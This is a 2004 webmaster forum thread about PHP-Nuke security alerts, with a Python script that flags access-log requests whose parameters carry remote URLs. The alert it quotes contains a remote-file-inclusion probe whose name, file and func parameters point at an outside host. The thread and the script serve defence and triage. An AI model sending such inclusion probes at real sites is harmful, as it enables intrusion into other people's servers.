I've been receiving several notifications like the following ... with [217.XX.104.226...] in the URL ... and am just curious if anyone knows what they are attempting to do?
Date & Time: 2004-07-08 02:30:56
Blocked IP: unknown...
User ID: Anonymous (1)
Reason: Abuse - OTHER
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/188.8.131.52
Query String: newbiehangout.com/modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.2XX.221.7
Remote Port: 57529
Request Method: GET
Who-Is for IP
OrgName: Unknown Works
Address: 3928 SE Tolman st
NetRange: 63.2XX.164.144 - 63.2XX.164.151
TechName: Internet Operations, XXYY
[edited by: DaveAtIFG at 7:37 pm (utc) on July 8, 2004]
[edit reason] No specifics please [/edit]
Let's just say it's been years since I got caught out with techniques like that, and it definitely "woke me up".
The URL that was in the original post led my browser to open multiple non-stop, self-replicating popups with huge binary sound files.
It's a play on the old trick of doing the same but with telnet windows to consume CPU resources, leading to a crash. If my memory serves me correctly, it was part of the first .hta virii generator called God Message (or something similar).
Anyway ... as to the cause of why you are getting these messages: where are you receiving them from?
A software firewall like Zone Alarm etc or in your server logs?
Thanks for letting me know.
I've been plagued with hack attempts ever since I opened up my PHP Nuke area. I was successfully hacked two times (2 days in a row) a few months ago, and then I put in some major security features ... one of which is called "Sentinel", and that is the program that is sending me the alerts letting me know that someone was banned on my site.
Usually the hack alert notifications are pretty straightforward and I can easily see what they were attempting ... usually it's some sort of SQL injection method or a play on the URL trying to add an admin account or something. And now Sentinel is beefed up to even ban agents or "web site grabbers".
But I just didn't understand the point of this one or what they were trying to accomplish with this. I've received tons of them in the last couple of days.
Seems kind of weird that they would be doing that to themselves ;o)
Anyway, thanks for your help and again ... sorry ... wasn't thinking when I posted that.
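The Query String in the alert above has every parameter (name, file, func) carrying a full remote URL. Whatever the sender hoped to achieve, that pattern is easy to pick out of an access log, and a checker like the one below is what a site owner could run to triage such alerts. This is an added example, not Sentinel's or PHP-Nuke's code; the log lines are constructed (the first reproduces the alert's request, the hosts example.invalid / 192.0.2.x / 198.51.100.x are placeholders), and the double-encoded case is assumed to matter because a single percent-decode would miss it.

```python
import re
from urllib.parse import parse_qsl, unquote

# URL schemes that PHP's include()/require() will fetch over the network
# when allow_url_fopen (and, on newer PHP, allow_url_include) is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Request target inside an Apache combined-format access log line, e.g.
#   "GET /modules.php?name=Forums HTTP/1.0"
_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d"')


def remote_url_params(request_target: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs whose value is an absolute remote URL.

    `request_target` is the path plus query string as logged, or as shown in
    an alert's Query String line. parse_qsl percent-decodes once; the extra
    unquote() catches double-encoded values (http%253A%252F%252F...).
    """
    query = request_target.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value).strip().lower()
        if decoded.startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan_access_log(lines):
    """Yield (line_number, hits) for each log line with a URL-valued parameter."""
    for lineno, line in enumerate(lines, start=1):
        m = _REQUEST_RE.search(line)
        if not m:
            continue
        hits = remote_url_params(m.group(1))
        if hits:
            yield lineno, hits


# Constructed sample log lines (not real traffic): the first reproduces the
# request from the alert in this thread, the second is ordinary PHP-Nuke use,
# the third is the same kind of probe with a double-encoded value.
SAMPLE_LOG = [
    '62.2XX.221.7 - - [08/Jul/2004:02:30:56 +0000] "GET /modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/ HTTP/1.0" 403 - "-" "curl/7.11.2"',
    '192.0.2.10 - - [08/Jul/2004:02:31:10 +0000] "GET /modules.php?name=Forums&file=viewtopic&t=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Jul/2004:02:32:41 +0000] "GET /modules.php?name=http%253A%252F%252Fexample.invalid%252F HTTP/1.0" 403 - "-" "curl/7.11.2"',
]

if __name__ == "__main__":
    for lineno, hits in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: " + ", ".join(f"{n}={v}" for n, v in hits))
```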
Just by posting the URL to your server you are getting the alerts. If they realise this then in all honesty you (and I) are going to check it out leading to the desired result.
Or ... if newbiehangout is your site, they could well be using it to mask attempts on others, as it appears from the format of the URL that it is proxying the request.
Good old fashioned social engineering technique.
Yep, that's my url .... but I quit checking the attempted hacks a long time ago. They were hitting my site left and right. I've come to believe in "security through obscurity" LOL
My site was fine until I developed a couple of modules for PHP Nuke ... and then the script kiddies found me and had a heyday until I installed all the security features. I still haven't added the content back to the Nuke Portal area ... I got a little nervous about re-adding it again after the first hacks. But there haven't been any successful hacks in about 3 months now ... so I guess I just need to get over it and move on ;o) It was a good learning experience for me though. Prior to that, I knew nothing about security and I ended up paying a price for that.
It's actually almost funny now ... but then it's also terribly sad that they don't have anything better to do than to mess with other people's sites like that. And they can't even claim it's for a "cause" or anything ;) It's just malicious. And I don't even think that they really "know" what they're doing. Most of the attempts come in floods ... like after a new vulnerability is posted ...
It's like they wait for someone else to post code and then they just copy and paste it to see if it works ;o)
Awww, well ... live and learn.
You've been a pleasure to talk to and I appreciate your help.